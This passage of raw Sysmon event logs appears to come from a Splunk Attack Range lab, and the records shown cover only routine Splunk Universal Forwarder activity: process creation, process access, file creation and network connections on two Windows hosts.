Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000105068Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:47:02.646{54715871-FD3A-60C9-7600-00000000CF01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=75D48FCFF16FB22F852277FB2BDB56D0,SHA256=9676818CA0171887353F9C90EA30EB98DC98D99D279B0014DBFF046226CEA44B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000105067Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:47:02.638{54715871-FD3A-60C9-7600-00000000CF01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=22C3AEEF0CF5EE804039F7362F96B50E,SHA256=0DA574032F715AEEE6CCAF5B049CFB5D3298AA8F9650A205910CE054EFF60E88,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000105066Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:47:02.637{54715871-FD29-60C9-3700-00000000CF01}33683396C:\Windows\system32\conhost.exe{54715871-7156-60CA-3313-00000000CF01}3500C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000105065Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:47:02.637{54715871-FD3A-60C9-7600-00000000CF01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=15A41AE70E2F4AB924918A7FA57FD23C,SHA256=23B78A61FFED3E00FE9B201A7B9456FDB2158ABE116EEE313B1CABE786245A87,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000105064Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:47:02.635{54715871-FD18-60C9-0C00-00000000CF01}8486924C:\Windows\system32\svchost.exe{54715871-FD28-60C9-2B00-00000000CF01}3040C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000105063Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:47:02.635{54715871-FD18-60C9-0C00-00000000CF01}8486924C:\Windows\system32\svchost.exe{54715871-FD28-60C9-2B00-00000000CF01}3040C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000105062Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:47:02.635{54715871-FD18-60C9-0C00-00000000CF01}8486924C:\Windows\system32\svchost.exe{54715871-FD28-60C9-2B00-00000000CF01}3040C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000105061Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:47:02.635{54715871-FD18-60C9-0C00-00000000CF01}8486924C:\Windows\system32\svchost.exe{54715871-FD28-60C9-2B00-00000000CF01}3040C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000105060Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:47:02.634{54715871-FD16-60C9-0500-00000000CF01}408424C:\Windows\system32\csrss.exe{54715871-7156-60CA-3313-00000000CF01}3500C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000105059Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:47:02.634{54715871-FD28-60C9-3000-00000000CF01}24483280C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{54715871-7156-60CA-3313-00000000CF01}3500C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000105058Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:47:02.634{54715871-7156-60CA-3313-00000000CF01}3500C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{54715871-FD16-60C9-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{54715871-FD28-60C9-3000-00000000CF01}2448C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000151679Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:47:02.750{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F53D420749E284168C613C8C3F3BE60A,SHA256=66E2B335D8E2E1AFEE24A20F1E8F6C3A50F4393A04F660C35697D2615F21F11C,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000151678Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:47:00.006{39BD8DE3-4818-60CA-2408-00000000D101}4064C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-14.attackrange.local58414-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 23542300x8000000000000000105080Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:47:03.537{54715871-FD28-60C9-3000-00000000CF01}2448NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=87657D68C727D4F417C5346ABF35F152,SHA256=9C850A5D797C891B275B40E6DB9307C8C7979F29879EB6EAEEA9A86ED4C088D1,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000105079Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:47:03.510{54715871-7157-60CA-3413-00000000CF01}52886840C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{54715871-FD28-60C9-3000-00000000CF01}2448C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000105078Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:47:03.355{54715871-FD3A-60C9-7600-00000000CF01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C23A5972BBEEBDE1214B23287833FEEC,SHA256=9DB142B0AB2FEAE0DB2BD147CAC8BA0A0B1A17BEFCF5AB60FE614449FBDE186E,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000105077Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:47:03.354{54715871-FD29-60C9-3700-00000000CF01}33683396C:\Windows\system32\conhost.exe{54715871-7157-60CA-3413-00000000CF01}5288C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000105076Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:47:03.352{54715871-FD18-60C9-0C00-00000000CF01}8486924C:\Windows\system32\svchost.exe{54715871-FD28-60C9-2B00-00000000CF01}3040C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000105075Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:47:03.352{54715871-FD18-60C9-0C00-00000000CF01}8486924C:\Windows\system32\svchost.exe{54715871-FD28-60C9-2B00-00000000CF01}3040C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000105074Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:47:03.352{54715871-FD18-60C9-0C00-00000000CF01}8486924C:\Windows\system32\svchost.exe{54715871-FD28-60C9-2B00-00000000CF01}3040C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000105073Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:47:03.351{54715871-FD18-60C9-0C00-00000000CF01}8486924C:\Windows\system32\svchost.exe{54715871-FD28-60C9-2B00-00000000CF01}3040C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000105072Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:47:03.351{54715871-FD16-60C9-0500-00000000CF01}408424C:\Windows\system32\csrss.exe{54715871-7157-60CA-3413-00000000CF01}5288C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000105071Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:47:03.351{54715871-FD28-60C9-3000-00000000CF01}24483280C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{54715871-7157-60CA-3413-00000000CF01}5288C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000105070Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:47:03.350{54715871-7157-60CA-3413-00000000CF01}5288C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{54715871-FD16-60C9-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{54715871-FD28-60C9-3000-00000000CF01}2448C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000151680Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:47:03.765{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D625BEB727D928E22529A568F3F9FAA7,SHA256=E5F4E49E9CD5D2DA90DD51AD06CF1C2E51A90C6E1E5E6F0FFC5380D975102DC6,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000105090Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:47:03.211{54715871-FD28-60C9-3000-00000000CF01}2448C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-681.attackrange.local55430-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8089- 23542300x8000000000000000105089Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:47:04.715{54715871-FD3A-60C9-7600-00000000CF01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3C3B7E68B0179A7A01C52048F3E6CA61,SHA256=F52C9280A1704527EFA1F56A9D230078F410014457B399A762E100B1E4E8F5F4,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000105088Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:47:04.041{54715871-FD29-60C9-3700-00000000CF01}33683396C:\Windows\system32\conhost.exe{54715871-7158-60CA-3513-00000000CF01}4960C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000105087Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:47:04.039{54715871-FD18-60C9-0C00-00000000CF01}8486924C:\Windows\system32\svchost.exe{54715871-FD28-60C9-2B00-00000000CF01}3040C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000105086Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:47:04.039{54715871-FD18-60C9-0C00-00000000CF01}8486924C:\Windows\system32\svchost.exe{54715871-FD28-60C9-2B00-00000000CF01}3040C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000105085Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:47:04.039{54715871-FD18-60C9-0C00-00000000CF01}8486924C:\Windows\system32\svchost.exe{54715871-FD28-60C9-2B00-00000000CF01}3040C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000105084Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:47:04.039{54715871-FD18-60C9-0C00-00000000CF01}8486924C:\Windows\system32\svchost.exe{54715871-FD28-60C9-2B00-00000000CF01}3040C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000105083Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:47:04.039{54715871-FD16-60C9-0500-00000000CF01}408368C:\Windows\system32\csrss.exe{54715871-7158-60CA-3513-00000000CF01}4960C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000105082Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:47:04.038{54715871-FD28-60C9-3000-00000000CF01}24483280C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{54715871-7158-60CA-3513-00000000CF01}4960C:\Program 